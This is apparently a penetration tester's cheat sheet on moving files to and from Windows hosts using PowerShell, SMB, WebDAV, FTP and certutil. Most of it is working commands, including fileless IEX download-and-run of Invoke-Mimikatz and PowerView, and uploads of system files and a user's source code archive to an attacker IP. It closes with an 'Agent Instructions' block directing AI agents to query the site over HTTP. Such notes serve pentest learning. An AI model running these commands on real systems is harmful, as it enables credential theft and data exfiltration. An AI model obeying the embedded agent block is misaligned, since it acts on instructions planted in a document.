# Windows ## POWERSHELL ### Base64 Encode & Decode Lin -> Win 1. **Check SSH Key MD5 Hash** ```bash md5sum id_rsa ``` 2. **Encode SSH Key to Base64** ```bash cat id_rsa | base64 -w 0;echo justimaginethisissomerandomhashbecauseyoudontcareandidontcare= ``` 3. **Decoding SSH Key on Windows machine** ```powershell PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("justimaginethisissomerandomhashbecauseyoudontcareandidontcare=")) ``` 4. **Confirming the MD5 Hashes Match** ```powershell Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 ``` {% hint style="info" %} It's not always possible to use this method because cmd.exe has a maximum string length of 8191 characters. And also web shell may error because of this large strings. {% endhint %} ### Base64 Encode & Decode Win -> Lin I explained above how to do encoding in **Linux** and decoding in **Powershell**, now I'll explain opposite: Encode in **Powershell** and decode in **Linux** 1. **Encode File Using Powershell** ```powershell # If you don't need to copy file to Clipboard, just delete that pipe PS C:\> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Tools\2025_BloodHound.zip")) | Set-Clipboard # Get hash ``` 2. **Decode Base64 String in Linux** ```bash echo justimaginethisissomerandomhashbecauseyoudontcareandidontcare= | base64 -d > 2025_BloodHound.zip # Or if you encoded file into clipboard, just paste output into file, and decode base64 -d bhoutput.txt > BH_GRAPH.zip ``` 3. **Get & Check Hash** ```powershell PS C:\> Get-FileHash "C:\Tools\2025_BloodHound.zip" -Algorithm MD5 | select Hash $ md5sum 2025_BloodHound.zip ``` ### Web Downloads In any version of **PowerShell**, the **System.Net.WebClient** class can be used to download a file over `HTTP, HTTPS or FTP`. The following [table](https://docs.microsoft.com/en-us/dotnet/api/system.net.webclient?view=net-6.0) describes WebClient methods for downloading data from a resource. 1. **File Download** ```powershell PS C:\> Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 PS C:\> iwr 13.13.13.13/file.exe -o file.exe #Syntax: (New-Object Net.WebClient).DownloadFile('','') PS C:\> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1') #Syntax: (New-Object Net.WebClient).DownloadFileAsync('','') PS C:\> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'PowerViewAsync.ps1') PS C:\> powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); " ``` 2. **PowerShell DownloadString - Fileless Method**. \ Fileless attacks work by using some operationg system functions to download the payload and execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias **IEX** ```powershell PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') ``` **Common Errors** * **Internet Explorer Error** ```powershell PS C:\> Invoke-WebRequest https:///PowerView.ps1 | IEX Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again. At line:1 char:1 + Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException + FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand PS C:\carnifex17> Invoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | IEX ``` * **SSL/TLS Untrusted certificate error** ```powershell PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') ``` ### PowerShell Web Uploads PowerShell doesn't have a built-in upload fucntions, so we need to use **Invoke-WebRequest**. or **Invoke-RestMethod.** Also we can use uploadserver module for Python, to install it we should use: ```bash pip3 install uploadserver ``` * **Turn On Web Server with Upload** ```bash python3 -m uploadserver ``` 1. **PowerShell Script to Upload a File to Python Upload Server** ```powershell PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') PS C:\> Invoke-FileUpload -Uri http://13.13.13.13:8000/upload -File C:\Windows\System32\drivers\etc\hosts ``` 2. **PowerShell Base64 Web Upload**. \ Convert file to base64 and send it using Invoke-WebRequest with POST method. ```powershell PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) PS C:\> Invoke-WebRequest -Uri http://13.13.13.13:8000/ -Method POST -Body $b64 ``` ```bash nc -lvnp 8000 ``` ```bash echo | base64 -d -w 0 > hosts ``` ## SMB ### Downloads 1. **Create the SMB Server** ```bash sudo impacket-smbserver share -smb2support /tmp/smbshare ``` 2. **Copy a File from the SMB Server** ```powershell C:\> copy \\192.168.220.133\share\nc.exe ``` * But in some scenarios there would be an error, which forbids us unauthentificated guest access, so we could creat a smb server with **authentification** 1. **Create the SMB Server with a Username and Password** ```bash sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test ``` 2. **Mount the SMB Server with Username and Password** ```powershell C:\> net use n: \\192.168.220.133\share /user:test test ``` ### Uploads SMB Uploads will be more tricky because companies usually block uploads to SMB, cause it could cause a huge problem. BUUUT we could use HTTP or HTTPS protocol in return. It's because when you use SMB, it will first attempt to connect using SMB protocol, and if there's no SMB share available, it'll try to connect using HTTP. But for this we need WebDav protocol, it enables a webserver to behave like a fileserver, which we need. First you need to install it ```bash sudo pip install wsgidav cheroot ``` 1. **Using the WebDav Python module** ```bash sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous ``` 2. **Connecting to the Webdav Share**. DavWWWRoot isn't a folder, it's a special keyword that tells WebDAV that we are connection to the root of WebDav server. You could use any existing directory when you are connecting, as example `sharefolder` ```powershell C:\> dir \\13.13.13.13\DavWWWRoot ``` 3. **Uploading Files using SMB** ```powershell C:\> copy C:\Users\john\Desktop\SourceCode.zip \\13.13.13.13\DavWWWRoot\ C:\> copy C:\Users\john\Desktop\SourceCode.zip \\13.13.13.13\sharefolder\ ``` ## FTP ### Downloads * **Installing FTP Server python3 module** ```bash sudo pip3 install pyftpdlib ``` 1. **Setting up a Python3 FTP Server** ```bash sudo python3 -m pyftpdlib --port 21 ``` 2. **Transferring Files from an FTP Server Using Powershell** ```powershell PS C:\> (New-Object Net.WebClient).DownloadFile('ftp://13.13.13.13/file.txt', 'C:\Users\Public\ftp-file.txt') ``` 3. **Create a Command File for the FTP Client and Download the Target File** ```bash C:\> echo open 13.13.13.13 > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo GET file.txt >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open 13.13.13.13 Log in with USER and PASS first. ftp> USER anonymous ftp> GET file.txt ftp> bye C:\> more file.txt This is a test file ``` ### Uploads For this we would also use `peftpdlib` but we need to specify the option --write to allow clients to upload files to our attack host. 1. **Starting FTP Server** ```bash sudo python3 -m pyftpdlib --port 21 --write ``` 2. **Powershell Upload File** ```powershell PS C:\> (New-Object Net.WebClient).UploadFile('ftp://13.13.13.13/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') ``` 3. **Create a Command File for the FTP Client to Upload a File** ```powershell C:\> echo open 13.13.13.13 > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open 13.13.13.13 Log in with USER and PASS first. ftp> USER anonymous ftp> PUT c:\windows\system32\drivers\etc\hosts ftp> bye ``` ## CERTUTIL ### File Transfer ```powershell PS C:\> certutil.exe -urlcache -split -f http://13.13.13.13:1337/youknowim.bat youknowim.bat ``` ### File Encode ```powershell C:\> certutil -encode file1 encodedfile ``` ### File Decode ```powershell C:\> certutil -decode encodedfile file2 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://venator17.gitbook.io/bibliotheque/pentesting/file-transfers/windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.